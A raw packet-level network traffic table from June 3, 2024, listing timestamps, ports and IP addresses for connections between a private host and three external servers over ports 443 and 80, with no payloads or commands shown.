Jun 3, 2024 08:51:24.985901117 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.985958099 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.986033916 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.986088037 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.986810923 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.986891985 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.986958981 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.987009048 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.987095118 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.988152027 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.203933954 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.203970909 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.204087973 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.204102993 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.204130888 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.204163074 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.204174995 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.204220057 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.205327034 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.205456018 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.205502987 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.205513954 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.205535889 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.205632925 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.207200050 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.207271099 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.207328081 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.207380056 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.207448959 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.207500935 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.207546949 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.207600117 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.207976103 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.208036900 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.208090067 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.208141088 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.208230019 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.208287954 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.208947897 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.209007978 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.209096909 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.209151030 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.209207058 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.209274054 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.210848093 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.210915089 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.210973978 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.211030006 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.211818933 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.211901903 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.211909056 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.211925983 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.211957932 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.211957932 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.212039948 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.212094069 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.212827921 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.212886095 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.212902069 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.212934971 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.212968111 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.213009119 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.213697910 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.213759899 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.214607000 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.214673042 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.214716911 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.214771032 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.443202972 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.443233967 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.443388939 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.443422079 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.443480015 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.443504095 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.443526030 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.443603039 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.444399118 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.444468975 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.444552898 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.444616079 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.444672108 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.444720984 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.444801092 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.444850922 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.445260048 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.445334911 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.446162939 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.446235895 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.446324110 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.446377039 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.446440935 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.446486950 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.447021008 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.447134972 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.447169065 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.447257042 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.447995901 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.448056936 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.448132992 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.448235035 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.448259115 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.448316097 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.450069904 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.450167894 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.450201988 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.450269938 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.450663090 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.450737953 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.450799942 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.450862885 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.451582909 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.451658010 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.451714993 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.451786041 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.452334881 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.452410936 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.452431917 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.452497959 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.691142082 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.691154003 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.691289902 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.691327095 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.691451073 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.692034006 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.692082882 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.692127943 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.692127943 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.692147017 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.692198038 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.693327904 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.693367004 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.693413973 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.693413973 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.693423033 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.693455935 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.693516970 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.694585085 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.694623947 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.694664001 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.694664001 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.694670916 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.694727898 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.695161104 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.695497990 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.695534945 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.695581913 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.695581913 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.695595026 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.695607901 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.695674896 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.697321892 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.697360039 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.697397947 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.697397947 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.697405100 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.697413921 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.697447062 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.697457075 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.697467089 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.697499037 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.697499037 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.697546959 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.698240042 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.698304892 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.698334932 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.698343992 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.698343992 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.698348045 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.698360920 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.698448896 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.699012041 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.699064016 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.700015068 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.700040102 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.700067043 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.700077057 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.700086117 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.700119972 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.700119972 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.700119972 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.700129032 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.700160027 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.700248957 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.700364113 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.700730085 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.700844049 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.736886024 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.736999989 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.926228046 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.926379919 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.926723957 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.926827908 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.926850080 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.926857948 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.926876068 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.927113056 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.927192926 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.927297115 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.927639008 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.927767992 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.927795887 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.927862883 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.928224087 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.928282976 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.928435087 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.928500891 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.928802967 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.928864002 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.929658890 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.929730892 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.929788113 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.929841042 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.929949999 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.930073023 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.930108070 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.930119991 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.930160999 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.930160999 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.930579901 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.930636883 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.930725098 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.930778980 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.930859089 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.930907011 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.931616068 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.931684017 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.931699038 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.931787014 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.932573080 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.932636023 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.933269024 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.933353901 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.933444977 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.933552980 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.933585882 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.933640957 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.933799982 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.933882952 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.934104919 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.934149981 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.934160948 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.934175968 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.934186935 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.934215069 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.934215069 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.934223890 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.934277058 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.934683084 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.934683084 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:25.972696066 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:25.972805977 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.170973063 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:26.171133041 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.171155930 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:26.171231031 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.172156096 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:26.172198057 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:26.172240019 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.172240019 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.172247887 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:26.172281027 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.172377110 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.172697067 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:26.172724009 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:26.172776937 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.172776937 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.172784090 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:26.172821999 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.173651934 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:26.173691988 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:26.173717022 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.173732042 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:26.173760891 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.173760891 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.173897982 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:26.173938036 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.173954964 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:26.173970938 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:26.174005985 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.174005985 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.174222946 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:26.174246073 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:52:09.555345058 CEST	49162	80	192.168.2.22	66.96.161.166
Jun 3, 2024 08:52:09.560309887 CEST	80	49162	66.96.161.166	192.168.2.22
Jun 3, 2024 08:52:09.560395956 CEST	49162	80	192.168.2.22	66.96.161.166
Jun 3, 2024 08:52:09.561023951 CEST	49162	80	192.168.2.22	66.96.161.166
Jun 3, 2024 08:52:09.565926075 CEST	80	49162	66.96.161.166	192.168.2.22
Jun 3, 2024 08:52:10.243381977 CEST	80	49162	66.96.161.166	192.168.2.22
Jun 3, 2024 08:52:10.286098003 CEST	80	49162	66.96.161.166	192.168.2.22
Jun 3, 2024 08:52:10.286247969 CEST	49162	80	192.168.2.22	66.96.161.166
Jun 3, 2024 08:52:10.286772966 CEST	49162	80	192.168.2.22	66.96.161.166
Jun 3, 2024 08:52:10.291680098 CEST	80	49162	66.96.161.166	192.168.2.22
Jun 3, 2024 08:52:14.572999001 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:14.577819109 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:14.577879906 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:14.579103947 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:14.584918022 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.169913054 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.169945002 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.169955969 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.169985056 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.170005083 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.170053005 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.170090914 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.170097113 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.170125961 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.170182943 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.170221090 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.170241117 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.170252085 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.170277119 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.170314074 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.170344114 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.170353889 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.170378923 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.174916983 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.174974918 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.174982071 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.175010920 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.175050020 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.175084114 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.175101995 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.175136089 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.191849947 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.287103891 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.287125111 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.287194014 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.287384033 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.287395000 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.287424088 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.287436008 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.287554026 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.287569046 CEST	80	49163	45.33.6.223	192.168.2.22
